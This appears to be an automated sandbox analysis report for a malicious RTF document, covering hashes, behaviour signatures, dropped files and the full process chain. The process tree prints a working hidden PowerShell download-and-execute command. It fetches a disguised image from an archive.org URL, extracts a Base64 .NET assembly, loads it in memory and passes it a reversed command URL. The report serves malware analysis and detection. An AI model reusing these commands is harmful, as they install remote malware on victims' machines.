Analysis

  • max time kernel
    100s
  • max time network
    17s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64 arch:x86 image:win7-20240708-en locale:en-us os:windows7-x64 system
  • submitted
    25/08/2024, 01:41

General

  • Target

    d5c9ffe0379eaf8d85d979a912bb12708eb3114905c5f4019257fc64c007af41.rtf

  • Size

    83KB

  • MD5

    aebf403b5cddd306587068a601e95d0b

  • SHA1

    371fcd641067189024899d0aabe59b66255915e0

  • SHA256

    d5c9ffe0379eaf8d85d979a912bb12708eb3114905c5f4019257fc64c007af41

  • SHA512

    ba2d17f1bf011415218359adc63bdf33032faaf175e87f0b5626ab5b5e6287413417a867b3c61eb8af4e7ff65d0265447cc3a4a30ec57588aaeb750e2819840f

  • SSDEEP

    768:b8m17hRO9d/Osx/Fn/j/ULSy8Zmi4Jby8:b8i7MlZ/FTG8oi4r

Score
10/10

Malware Config

Extracted

  • Language

    ps1

  • Deobfuscated

  • URLs

    ps1.dropper

    https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

    exe.dropper

    https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Runs PowerShell and hides the display window.

  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\d5c9ffe0379eaf8d85d979a912bb12708eb3114905c5f4019257fc64c007af41.rtf"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:808
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2328
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • System Location Discovery: System Language Discovery
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:2052
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\goodpicturewithgoodbutterswe.vBS"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2840
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[obfuscated Base64 payload omitted]';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('⥶ ⼻ ㎮ ㋺ ⑂','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3048
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.ASMC/541/252.311.571.701//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2780

    Network

          MITRE ATT&CK Enterprise v15

          Downloads

          • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

            Filesize

            19KB

            MD5

            f87703948653e0dc65cfd0374ae77f14

            SHA1

            492bd174d74764156a2fff95884ddf23304691da

            SHA256

            3fc4722313cc6a806de07ba123c1b78cd067d82508f933064be0b906d48e56c8

            SHA512

            bb15abbce4743f3d7f3a47ebe756ad6886ff3a7ee976e70feb8764e01fa8528b64d3673e0c4b3416053ac480fb771de8affc163d7b0b05dc290449e20fa4f6fe

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

            Filesize

            7KB

            MD5

            03ed730f1185836fa28765b29f94e569

            SHA1

            2f91b34261d634c096c9bf4a3af2dbac0d052960

            SHA256

            9bd408e78acc33a12648f847d040998ec98c8e4017174b0cdd4379ed7d11f576

            SHA512

            72d990337c3b207beff9bde94a7001b4ef9f75e0d240c943ec584e8634883ecc5bacb60943335b09eca079bf45e844da1c98845d10d3ed0f950123ddd571a815

          • C:\Users\Admin\AppData\Roaming\goodpicturewithgoodbutterswe.vBS

            Filesize

            178KB

            MD5

            47884612318c771b324b93d9ce36c534

            SHA1

            3802e1e23d944d5b8c49039d97d1131503300040

            SHA256

            7288e52716c9c88e2489310f47266865831b0880601cc029843a13536e7cb571

            SHA512

            82889ca4282bae018ccc880a9c265baae1032181371a0388a8210ce57a9eeb608d443bbbc8e20dc10ecbf623516f21dc2d32b5f1f04cb21223f9584c25ee89e9

          • memory/808-0-0x000000002F801000-0x000000002F802000-memory.dmp

            Filesize

            4KB

          • memory/808-2-0x000000007117D000-0x0000000071188000-memory.dmp

            Filesize

            44KB

          • memory/808-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/808-23-0x000000007117D000-0x0000000071188000-memory.dmp

            Filesize

            44KB

          • memory/808-41-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB